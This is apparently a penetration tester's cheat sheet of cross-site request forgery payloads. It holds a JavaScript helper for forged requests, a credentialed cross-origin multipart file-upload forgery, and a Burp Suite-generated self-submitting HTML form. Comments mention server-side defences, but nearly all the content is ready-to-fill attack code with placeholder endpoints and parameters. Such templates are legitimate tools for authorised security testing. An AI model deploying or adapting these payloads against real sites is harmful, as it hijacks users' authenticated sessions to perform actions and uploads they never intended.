CSRF
Cross-Site Request Forgery (CSRF)

Request

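/**
 * Send an XMLHttpRequest with the given method, URL and optional body.
 *
 * The request is opened in the default asynchronous mode, so the returned
 * object has usually not completed yet; attach a listener to it if the
 * response matters. `withCredentials` is left at its default, so for a
 * cross-origin URL the browser sends the request without cookies.
 *
 * POST bodies are labelled application/x-www-form-urlencoded. That is a
 * CORS-safelisted content type, so a receiving server gets no preflight for
 * it and has to reject forged requests itself (anti-CSRF token, SameSite
 * cookies, Origin validation).
 *
 * @param {string} method - HTTP method, e.g. "GET" or "POST".
 * @param {string} url - Target URL; a relative path resolves against the page origin.
 * @param {?string} [body=null] - Request body, only meaningful for POST.
 * @returns {XMLHttpRequest} The request object that was sent.
 */
function req(method, url, body = null) {
  // Declared locally: the original assigned an undeclared `request`, which
  // leaks a global in sloppy mode and throws in strict mode / ES modules.
  const request = new XMLHttpRequest();
  request.open(method, url);
  if (method === "POST") {
    request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  }
  request.send(body);
  // The original "wait" loop had `return request` as its body, so it never
  // waited and returned undefined once readyState was DONE. Return the
  // request unconditionally instead.
  return request;
}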
/**
 * Template hook that issues the state-changing request through req().
 *
 * The method, endpoint and data strings are placeholders to fill in for the
 * application under test.
 *
 * @param {*} needed_value - Not referenced by the template body as written;
 *   presumably meant to be worked into the request data (confirm when adapting).
 */
function trigger_change(needed_value) {
  const method = "METHOD";
  const endpoint = "/ENDPOINT";
  const payload = "DATA (IF POST REQUEST)";
  req(method, endpoint, payload);
}
// Run the template once when the script loads; "VALUE" is a placeholder.
trigger_change("VALUE");

File Upload

// Placeholder for the upload endpoint; as a path it resolves against the
// origin of the page that runs this script.
var targetLocation = "/ENDPOINT";
/**
 * Reduce the first UTF-16 code unit of a string to a single byte.
 *
 * @param {string} x - String whose first code unit is read.
 * @returns {number} The low 8 bits of that code unit (0-255).
 */
function byteValue(x) {
  const LOW_BYTE_MASK = 0xff;
  return LOW_BYTE_MASK & x.charCodeAt(0);
}
/**
 * Convert a binary string into an ArrayBuffer, one byte per character.
 *
 * Each character is passed through byteValue(), so only the low 8 bits of
 * every UTF-16 code unit are kept.
 *
 * @param {string} datastr - String treated as a sequence of byte values.
 * @returns {ArrayBuffer} Buffer holding datastr.length bytes.
 */
function toBytes(datastr) {
  const bytes = new Uint8Array(datastr.length);
  for (let index = 0; index < datastr.length; index += 1) {
    bytes[index] = byteValue(datastr[index]);
  }
  return bytes.buffer;
}
// Polyfill for the non-standard XMLHttpRequest#sendAsBinary, installed only
// when the browser does not already provide it. The string is converted to an
// ArrayBuffer first so that send() transmits the bytes as they are instead of
// re-encoding the string as text.
if (typeof XMLHttpRequest.prototype.sendAsBinary === "undefined" && Uint8Array) {
  XMLHttpRequest.prototype.sendAsBinary = function (datastr) {
    const payload = toBytes(datastr);
    this.send(payload);
  };
}
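/**
 * Build a multipart/form-data body by hand and POST it to targetLocation.
 *
 * The request is asynchronous and sent with withCredentials enabled, which
 * asks the browser to attach cookies even when the target is cross-origin.
 * multipart/form-data is a CORS-safelisted content type, so a receiving
 * server cannot count on a preflight to stop this request; it needs its own
 * check (anti-CSRF token, SameSite cookies, Origin validation).
 *
 * Field names, the file name and the file data are concatenated into the
 * body without escaping, so they must not contain CR/LF or the boundary.
 *
 * @param {string} fileData - File content as a binary string (one character per byte).
 * @param {string} fileName - File name reported in the Content-Disposition header.
 * @returns {boolean} Always true, returned once the request has been handed to the browser.
 */
function fileUpload(fileData, fileName) {
  const boundary = "--------------------------------1337"; // MAX 70 chars.
  // Extra plain form fields to send before the file part: { name: value }.
  const additionalFields = {};
  const fileFieldName = "fieldName";

  const xhr = new XMLHttpRequest();
  xhr.open("POST", targetLocation, true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*;q=0.8");
  // Simulate a file MIME POST request.
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  // No Content-Length here: it is a forbidden request header that the browser
  // computes itself and refuses to let script set, and the value the original
  // passed was the file length rather than the body length.
  // Boolean instead of the original string "true".
  xhr.withCredentials = true;

  // Logs on every readyState change, so early calls print an empty string.
  xhr.onreadystatechange = function () {
    console.log(xhr.responseText);
  };

  let body = "";
  // Object.entries visits own enumerable keys only, matching the original
  // for-in loop with its hasOwnProperty guard.
  for (const [fieldName, fieldValue] of Object.entries(additionalFields)) {
    body += addField(fieldName, fieldValue, boundary);
  }

  body += addFileField(fileFieldName, fileData, fileName, boundary);
  body += "--" + boundary + "--"; // closing delimiter
  xhr.sendAsBinary(body);
  return true;
}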
/**
 * Render one plain form field as a multipart/form-data part.
 *
 * name and value are inserted without escaping. The name parameter is
 * wrapped in single quotes as written.
 * NOTE(review): RFC 7578 shows these parameters in double quotes, and
 * parsers differ in how they treat single quotes.
 *
 * @param {string} name - Form field name.
 * @param {string} value - Field value placed in the part body.
 * @param {string} boundary - Multipart boundary without the leading "--".
 * @returns {string} Delimiter line, headers, blank line, value and trailing CRLF.
 */
function addField(name, value, boundary) {
  const delimiterLine = "--" + boundary + "\r\n";
  const dispositionHeader = "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
  const partBody = value + "\r\n";
  return delimiterLine + dispositionHeader + partBody;
}
/**
 * Render a file upload as a multipart/form-data part.
 *
 * The part is always labelled Content-Type: application/x-compressed,
 * whatever the data is. name, filename and value are inserted without
 * escaping, and the parameters are wrapped in single quotes as written.
 * NOTE(review): RFC 7578 shows these parameters in double quotes, and
 * parsers differ in how they treat single quotes.
 *
 * @param {string} name - Form field name of the file input.
 * @param {string} value - File content as a binary string.
 * @param {string} filename - File name reported to the server.
 * @param {string} boundary - Multipart boundary without the leading "--".
 * @returns {string} Delimiter line, headers, blank line, content and trailing CRLF.
 */
function addFileField(name, value, filename, boundary) {
  const delimiterLine = "--" + boundary + "\r\n";
  const dispositionHeader =
    "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
  const typeHeader = "Content-Type: application/x-compressed\r\n\r\n";
  const partBody = value + "\r\n";
  return delimiterLine + dispositionHeader + typeHeader + partBody;
}
// Entry point: uploads the placeholder content under the placeholder name.
// The data string is converted one character per byte before sending, so it
// is presumably meant to be written with \xNN escapes rather than as hex
// digits (confirm when adapting).
var start = function () {
  fileUpload("HEX-FILE-DATA", "FILE-NAME");
};

start();

Form Submit

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <!--
    Self-submitting form: the hidden inputs carry the request parameters and
    the inline script submits the form as soon as it is parsed, producing a
    top-level POST to the action URL. history.pushState rewrites the path in
    the address bar to "/" without reloading.
    Cookies marked SameSite=Lax or Strict are withheld from a cross-site POST
    like this one, and a per-request anti-CSRF token or an Origin check on
    the server rejects it as well.
  -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http(s)://server" method="POST">
      <input type="hidden" name="param1" value="1" />
      <input type="hidden" name="param2" value="2" />
      <input type="submit" value="Submit Request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>